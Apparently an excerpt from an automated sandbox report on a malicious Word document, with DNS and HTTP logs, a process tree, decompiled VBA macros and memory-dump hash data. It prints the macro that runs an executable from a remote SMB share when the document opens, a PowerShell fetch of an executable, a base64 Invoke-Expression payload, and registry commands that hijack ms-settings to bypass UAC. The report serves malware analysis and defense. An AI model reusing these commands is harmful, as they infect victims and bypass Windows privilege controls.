                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.27.139 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.40.49 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.106.73 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.234 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.139.153 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.27.104 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.34.177 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.171.25 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.35.145 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.163.113 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.228.249 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.113.217 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.24.104 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.2.232 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959451914 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.21 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.171.25 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.35.145 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.163.113 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.228.249 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.113.217 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.24.104 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.2.232 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118021965 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.21 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.52.49 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.149 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.68.97 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.0.67 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.199 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.14.52 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.40.89 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.279392958 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.25.100 | A (IP address) | IN (0x0001) | false
                                                            • bitbucket.org
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.22 | 49164 | 104.192.141.1 | 443 | 3560 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2023-12-21 08:50:31 UTC | 195 | OUT | GET /olegovich-007/777/downloads/wsuscr.exe HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
                                                            Host: bitbucket.org
                                                            Connection: Keep-Alive
                                                            2023-12-21 08:50:32 UTC | 4250 | IN | HTTP/1.1 302 Found
                                                            server: envoy
                                                            x-usage-quota-remaining: 981674.965
                                                            vary: Accept-Language, Origin
                                                            x-usage-request-cost: 18512.20
                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                            Content-Type: text/html; charset=utf-8
                                                            x-b3-traceid: bf0c8c4366be9620
                                                            x-usage-output-ops: 0
                                                            x-used-mesh: False
                                                            x-dc-location: Micros-3
                                                            content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Date: Thu, 21 Dec 2023 08:50:32 GMT
                                                            x-usage-user-time: 0.515344
                                                            x-usage-system-time: 0.040022
                                                            location: https://bbuseruploads.s3.amazonaws.com/7ea556d7-c0f5-4b27-9352-362ff0b0d6cb/downloads/2850b0f6-002e-418f-976b-b3b8109850d9/wsuscr.exe?response-content-disposition=attachment%3B%20filename%3D%22wsuscr.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAIJ4MWI5&Signature=FTZ8RV5EOoni3gC3Mrl9%2FYklaEM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEIn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDGven%2FJb42bohVJSV2QCloazsRjFFml9mJba04RvdwRwIgKgYYi%2F5a3hYiD6wlRu177JuOGeBolD5nF0sXYeBwrHIqpwIIEhAAGgw5ODQ1MjUxMDExNDYiDAuJPSFjW7kSer9iRyqEAl9NFNJ%2FJwMoGXDZoTip7aCYSSSFIhhgfTS%2Fc3eMtqt6rcLiUxKM2nSoyDbsWzPKY0uHX6392%2BQS1ev%2FIpkFwloCnE3qO7WCziWnXbmmVePlh15MTfIjI11Rp5pnaq9dxulK%2FApguvuSnrgMCD%2FXG6tD7OV9DzqLMR%2FjGxfGtPr4c6ibg6Je8MgYf651ENHdfl1hNPrCl338SRZo4i0PZu1KSQeqX7aWtscdsVrARbqmcdpURJ46v5%2FkVYe%2FvJrc0Dx6oVNS5PPt8JwUROuhOBPDKXeeP%2BrhZD8KvvBZHj2FguAJRjSy8nbu6TYy3tqCsxgQ1efZYgrZWzSZg24QKGpXm0agMNj4j6wGOp0BMWK80r3cWpRJnmL0EgSAUjCOtSRO7Bt6F1slSAfB5mdTy7QciPsAVDA1eZlC6ennXSo2G0HtPgqe13GBwFN6YRI5gZr%2BXqJYph1iDvUX%2F7ddwJXkFbh4oVAoZShgRAZOltozkfnyg1LNwSuCTBOanMAPLrxJt6xqnY0kB2LjNYWYNbyVwdkMBpBKtUz5f2cA2gJO2H7jprzGlc4QmA%3D%3D&Expires=1703150432
                                                            expires: Thu, 21 Dec 2023 08:50:32 GMT
                                                            x-served-by: 75862792d71e
                                                            x-envoy-upstream-service-time: 684
                                                            content-language: en
                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                            x-b3-spanid: bf0c8c4366be9620
                                                            x-static-version: a44564505899
                                                            x-render-time: 0.6695590019226074
                                                            Connection: close
                                                            x-usage-input-ops: 0
                                                            x-version: a44564505899
                                                            x-request-count: 3981
                                                            x-frame-options: SAMEORIGIN
                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                            Content-Length: 0
                                                            Target ID:0
                                                            Start time:09:50:09
                                                            Start date:21/12/2023
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13fc20000
                                                            File size:1'423'704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:09:50:11
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:explorer.exe "\\89.23.98.22\LN\"
                                                            Imagebase:0xff2f0000
                                                            File size:3'229'696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:09:50:15
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                            Imagebase:0xff2f0000
                                                            File size:3'229'696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:09:50:21
                                                            Start date:21/12/2023
                                                            Path:\Device\Mup\89.23.98.22\LN\GB.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:\\89.23.98.22\LN\GB.exe
                                                            Imagebase:0x13f040000
                                                            File size:268'800 bytes
                                                            MD5 hash:C3E7CFA2E076C3CA421DDC00496C71B5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:09:50:22
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -Command Stop-Process -Name explorer
                                                            Imagebase:0x13f220000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:09:50:22
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /c res.bat && test2.exe
                                                            Imagebase:0x4a0a0000
                                                            File size:345'088 bytes
                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:09:50:23
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo f "
                                                            Imagebase:0x4a0a0000
                                                            File size:345'088 bytes
                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:09:50:23
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\xcopy.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe"
                                                            Imagebase:0xffbb0000
                                                            File size:43'008 bytes
                                                            MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:09:50:23
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression"
                                                            Imagebase:0x13f220000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:09:50:24
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
                                                            Imagebase:0xffe40000
                                                            File size:74'752 bytes
                                                            MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:09:50:24
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
                                                            Imagebase:0xffc60000
                                                            File size:74'752 bytes
                                                            MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:09:50:25
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:explorer.exe
                                                            Imagebase:0xff2f0000
                                                            File size:3'229'696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:17
                                                            Start time:09:50:29
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f
                                                            Imagebase:0xff850000
                                                            File size:74'752 bytes
                                                            MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:09:50:29
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
                                                            Imagebase:0xffd90000
                                                            File size:74'752 bytes
                                                            MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:09:50:36
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                            Imagebase:0xff5e0000
                                                            File size:45'568 bytes
                                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Call Graph

                                                            Legend: Entrypoint, Decryption Function, Executed, Not Executed

                                                            Nodes (node IDs as in the graph source):
                                                            2   kjhkjhkd       (no API calls)
                                                            12  Document_Open  Shell:1, vbNormalFocus:1
                                                            39  RunExecutable  Shell:2, vbNormalFocus:1, vbHide:1

                                                            Edges:
                                                            12 -> 39  (Document_Open calls RunExecutable)

                                                            Module: NewMacros

                                                            Declaration
                                                            Line  Content
                                                            1     Attribute VB_Name = "NewMacros"

                                                            Line  Instruction                        Meta Information
                                                            2     Sub kjhkjhkd()
                                                            8     End Sub

                                                            Module: ThisDocument

                                                            Declaration
                                                            Line  Content
                                                            1     Attribute VB_Name = "ThisDocument"
                                                            2     Attribute VB_Base = "1Normal.ThisDocument"
                                                            3     Attribute VB_GlobalNameSpace = False
                                                            4     Attribute VB_Creatable = False
                                                            5     Attribute VB_PredeclaredId = True
                                                            6     Attribute VB_Exposed = True
                                                            7     Attribute VB_TemplateDerived = True
                                                            8     Attribute VB_Customizable = True

                                                            RunExecutable@ThisDocument

                                                            APIs   Meta Information
                                                            Shell  Shell(""\\89.23.98.22\LN\GB.exe"",1) -> 3444; vbNormalFocus
                                                            Shell  Shell("powershell.exe -Command Stop-Process -Name explorer",0) -> 3476; vbHide

                                                            Strings                                                Decrypted Strings
                                                            "\\89.23.98.22\LN\"
                                                            "GB.exe"
                                                            """"
                                                            "powershell.exe -Command Stop-Process -Name explorer"

                                                            Line  Instruction                                                                Meta Information
                                                            24    Sub RunExecutable()
                                                            25    Dim FASFASFHBNVNVB as String                                               executed
                                                            26    Dim ireowrppqwcxva as String
                                                            29    FASFASFHBNVNVB = "\\89.23.98.22\LN\"
                                                            30    ireowrppqwcxva = "GB.exe"
                                                            33    Call Shell("""" & FASFASFHBNVNVB & ireowrppqwcxva & """", vbNormalFocus)   Shell(""\\89.23.98.22\LN\GB.exe"",1) -> 3444; vbNormalFocus; executed
                                                            34    Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)  Shell("powershell.exe -Command Stop-Process -Name explorer",0) -> 3476; vbHide; executed
                                                            35    End Sub

                                                            Document_Open@ThisDocument

                                                            APIs   Meta Information
                                                            Shell  Shell("explorer.exe "\\89.23.98.22\LN\"",1) -> 3292; vbNormalFocus
                                                                   Part of subcall function RunExecutable@ThisDocument: Shell; vbNormalFocus
                                                                   Part of subcall function RunExecutable@ThisDocument: Shell; vbHide

                                                            Strings                Decrypted Strings
                                                            "\\89.23.98.22\LN\"
                                                            "GB.exe"
                                                            "explorer.exe """

                                                            Line  Instruction                                                          Meta Information
                                                            9     Private Sub Document_Open()
                                                            10    Dim FASFASFHBNVNVB as String                                         executed
                                                            11    Dim ireowrppqwcxva as String
                                                            14    FASFASFHBNVNVB = "\\89.23.98.22\LN\"
                                                            15    ireowrppqwcxva = "GB.exe"
                                                            18    Call Shell("explorer.exe """ & FASFASFHBNVNVB & """", vbNormalFocus)  Shell("explorer.exe "\\89.23.98.22\LN\"",1) -> 3292; vbNormalFocus; executed
                                                            21    RunExecutable
                                                            22    End Sub

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6<$6<$r6<$r6<$r6<
                                                              • API String ID: 0-3676009374
                                                              • Opcode ID: ed184a11ac3c8c0898aa023dae6d367a80d71b1431697b5acfc5e7bfd282a91b
                                                              • Instruction ID: 2bafd14e7ba33c0b4155f67661162a3d5a6cc115a9fbdf7a2a2666fbd5bb011a
                                                              • Opcode Fuzzy Hash: ed184a11ac3c8c0898aa023dae6d367a80d71b1431697b5acfc5e7bfd282a91b
                                                              • Instruction Fuzzy Hash: 8FC1293090CAC94FE796E72C84586B97FE1EF5A394F1901EBD04EC72A3DA24AC55C361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 88n$Xhu
                                                              • API String ID: 0-82906670
                                                              • Opcode ID: 489144c31ab926f70acfee83fd425bc4b5f811a1ea26bbb5df032282985f0d8d
                                                              • Instruction ID: db302215883f9871ad856d9026ec37ccbc36c1d6f4c8051291371597dd057a23
                                                              • Opcode Fuzzy Hash: 489144c31ab926f70acfee83fd425bc4b5f811a1ea26bbb5df032282985f0d8d
                                                              • Instruction Fuzzy Hash: E2513721A0EBD90FEB57A32858246E97FA1EF97360F1901EBD08DC71E3D914AD15C3A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392199959.000007FE89520000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89520000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe89520000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6<
                                                              • API String ID: 0-4042678817
                                                              • Opcode ID: 19c7a3ea8886c32742ffd94862a13413f6482869599a5627025c8e89c0857b5c
                                                              • Instruction ID: a6e4bd9a271e302de392222570b061fd18beba992b82c8b96c574f1a9bfdf5c6
                                                              • Opcode Fuzzy Hash: 19c7a3ea8886c32742ffd94862a13413f6482869599a5627025c8e89c0857b5c
                                                              • Instruction Fuzzy Hash: 6EC15030A08A4D8FDF85EF98D455BEDBBA1FF69740F14415AD40DD72A6CA34E881CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 704d7d9054c1211ad4f09d58a71c9e5cccdff20dfdd6aeafc283760c193e2bc2
• Instruction ID: 7be87c9d5ef4ca641665d8266f419cbf1f32e4bf3b64af9f65aa7e170a9123a7
• Opcode Fuzzy Hash: 704d7d9054c1211ad4f09d58a71c9e5cccdff20dfdd6aeafc283760c193e2bc2
• Instruction Fuzzy Hash: B7D1373180EBC91FD357A7389814AB67FA5EF47660F0901EBD08DC70A3D618A956C3B2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2e71295e7504435c030acbfbeeee75d758ebb9a52006f851adae6e1ba9b4856d
• Instruction ID: ea63a8dc7e6af4821cd53dc6a980a771ca130a5bf593c4c48744a0380e79c9b2
• Opcode Fuzzy Hash: 2e71295e7504435c030acbfbeeee75d758ebb9a52006f851adae6e1ba9b4856d
• Instruction Fuzzy Hash: 69C14530A1DACD0FE75AA72C54146BA7FA1FF46354F1811FAE48EC71A3CA18AC52C361
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
